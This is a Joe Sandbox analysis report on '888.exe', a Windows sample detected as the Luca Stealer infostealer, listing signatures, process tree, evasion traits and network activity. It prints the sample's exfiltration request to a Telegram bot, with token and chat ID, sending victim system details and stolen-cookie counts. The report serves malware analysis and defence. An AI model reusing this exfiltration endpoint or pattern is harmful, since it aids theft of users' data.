Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
888.exe

Overview

General Information

Sample name:888.exe
Analysis ID:1574586
MD5:b6e5859c20c608bf7e23a9b4f8b3b699
SHA1:302a43d218e5fd4e766d8ac439d04c5662956cc3
SHA256:bd5532a95156e366332a5ad57c97ca65a57816e702d3bf1216d4e09b899f3075
Tags:exeuser-lontze7
Infos:

Detection

Luca Stealer
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Luca Stealer
AI detected suspicious sample
Deletes itself after installation
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • 888.exe (PID: 7888 cmdline: "C:\Users\user\Desktop\888.exe" MD5: B6E5859C20C608BF7E23A9B4F8B3B699)
    • powershell.exe (PID: 2112 cmdline: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
888.exeJoeSecurity_LucaStealerYara detected Luca StealerJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_LucaStealerYara detected Luca StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1849050689.000000000131F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
        Process Memory Space: 888.exe PID: 7888JoeSecurity_LucaStealerYara detected Luca StealerJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.888.exe.a50000.0.unpackJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
            0.0.888.exe.a50000.0.unpackJoeSecurity_LucaStealerYara detected Luca StealerJoe Security

              Sigma Signatures

              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\888.exe", ParentImage: C:\Users\user\Desktop\888.exe, ParentProcessId: 7888, ParentProcessName: 888.exe, ProcessCommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", ProcessId: 2112, ProcessName: powershell.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: 888.exeReversingLabs: Detection: 52%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Machine Learning detection for sample
              Source: 888.exeJoe Sandbox ML: detected
              Source: 888.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49825 version: TLS 1.2
              Source: 888.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: 888.exe, 00000000.00000003.1719343963.0000000001357000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\Jump to behavior

              Networking

              barindex
              Uses the Telegram API (likely for C&C communication)
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficHTTP traffic detected: POST /bot6144496200:AAG-IIb4TPBPT1INBnZWa7iLZBVaG67I2mE/sendDocument?chat_id=-1001562112668&caption=%3Ccode%3E%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.189%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20PGFKD3%20(1280,%201024)%0AHWID:%205146949416814903%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\888.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0ATelegram:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Cookies:%20%3C/code%3E&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=2d88adf10cbad28c-2759270d23c57240-8cf43d1437ebaac5-72f0b48001fd812acontent-length: 889952accept: */*host: api.telegram.org
              Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
              Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 108.181.61.49 108.181.61.49
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: ipwho.is
              Source: unknownDNS query: name: ipwho.is
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
              Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
              Source: global trafficDNS traffic detected: DNS query: ipwho.is
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot6144496200:AAG-IIb4TPBPT1INBnZWa7iLZBVaG67I2mE/sendDocument?chat_id=-1001562112668&caption=%3Ccode%3E%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.189%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20PGFKD3%20(1280,%201024)%0AHWID:%205146949416814903%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\888.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0ATelegram:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Cookies:%20%3C/code%3E&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=2d88adf10cbad28c-2759270d23c57240-8cf43d1437ebaac5-72f0b48001fd812acontent-length: 889952accept: */*host: api.telegram.org
              Source: 888.exe, 00000000.00000002.1849949792.0000000001034000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ipwho.is/?output=json
              Source: 888.exe, 00000000.00000002.1849949792.0000000001034000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ipwho.is/?output=jsonB
              Source: 888.exeString found in binary or memory: http://ns.adobe.
              Source: 888.exeString found in binary or memory: http://www.w3.or
              Source: 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: 888.exe, 00000000.00000002.1851135318.000000000448C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6144496200:AAG-IIb4TPBPT1INBnZWa7iLZBVaG67I2mE/sendDocument?chat_id=-100
              Source: 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: 888.exe, 00000000.00000003.1849050689.000000000131F000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000002.1850227693.000000000131F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ipwhois.io/flags/us.svg
              Source: 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: 888.exeString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
              Source: 888.exeString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support0
              Source: 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.drString found in binary or memory: https://www.ecosia.org/newtab/
              Source: 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49825 version: TLS 1.2
              Source: C:\Users\user\Desktop\888.exeCode function: 0_2_00A713400_2_00A71340
              Source: C:\Users\user\Desktop\888.exeCode function: 0_2_00C7EB200_2_00C7EB20
              Source: C:\Users\user\Desktop\888.exeCode function: 0_2_00C66F300_2_00C66F30
              Source: 888.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 888.exeBinary string: }Failed to open \Device\Afd\Mio:
              Source: 888.exeBinary string: N\Device\Afd\Mio
              Source: 888.exeBinary string: Failed to open \Device\Afd\Mio:
              Source: classification engineClassification label: mal80.troj.spyw.winEXE@4/15@3/2
              Source: C:\Users\user\Desktop\888.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dtbqpus9.default\key4.dbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
              Source: C:\Users\user\Desktop\888.exeFile created: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Jump to behavior
              Source: 888.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\888.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\user\Desktop\888.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 888.exe, 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: 888.exe, 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: 888.exe, 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: 888.exe, 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: 888.exe, 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: 888.exe, 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: 888.exe, 00000000.00000003.1719296938.0000000001375000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000003.1722280750.0000000001375000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000003.1719742980.0000000001376000.00000004.00000020.00020000.00000000.sdmp, Login Data.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: 888.exe, 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: 888.exeReversingLabs: Detection: 52%
              Source: unknownProcess created: C:\Users\user\Desktop\888.exe "C:\Users\user\Desktop\888.exe"
              Source: C:\Users\user\Desktop\888.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\888.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"Jump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\888.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: 888.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: 888.exeStatic file information: File size 4885504 > 1048576
              Source: 888.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x358200
              Source: 888.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x130200
              Source: 888.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: 888.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: 888.exe, 00000000.00000003.1719343963.0000000001357000.00000004.00000020.00020000.00000000.sdmp

              Hooking and other Techniques for Hiding and Protection

              barindex
              Deletes itself after installation
              Source: C:\Users\user\Desktop\888.exeFile deleted: c:\users\user\desktop\888.exeJump to behavior
              Source: C:\Users\user\Desktop\888.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
